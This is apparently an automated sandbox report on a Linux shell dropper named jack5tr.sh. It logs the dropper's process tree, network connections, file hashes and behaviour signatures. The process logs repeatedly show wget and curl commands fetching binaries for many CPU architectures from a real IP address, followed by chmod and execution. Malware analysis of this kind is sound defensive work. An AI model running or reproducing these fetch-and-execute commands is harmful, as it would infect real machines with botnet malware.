[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x RUN arc arm gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:37

Platform

debian12-armhf-20240221-en

Max time kernel

8s

Max time network

310s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-95ee504168b8491395abd7d23b35057c-logrotate.service-4xrxzy systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-4 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-4 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-4 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-4 udp
